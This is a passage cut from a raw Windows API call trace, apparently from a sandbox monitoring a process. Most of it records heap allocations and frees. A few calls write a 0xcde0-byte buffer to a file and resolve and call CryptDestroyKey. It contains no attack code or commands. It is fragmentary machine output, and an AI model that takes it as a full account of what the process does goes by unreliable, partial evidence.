dwFlags=0x0, lpMem=0x2ea6ce8 | out: hHeap=0x970000) returned 1 [0215.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2ea6ce8 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8d118 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0215.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0215.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3dbe8 | out: hHeap=0x970000) returned 1 [0215.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0215.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e99f00 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30e00 | out: hHeap=0x970000) returned 1 [0215.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2e80330 [0215.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea6ce8 | out: hHeap=0x970000) returned 1 [0215.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0215.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcde0) returned 0x2f24018 [0215.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.507] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0xcde0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0xcde0, lpOverlapped=0x0) returned 1 [0215.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0215.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0215.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.524] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0215.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0215.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0215.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.525] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0215.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.526] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.528] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0215.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.528] CryptDestroyKey (hKey=0xa87510) returned 1 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 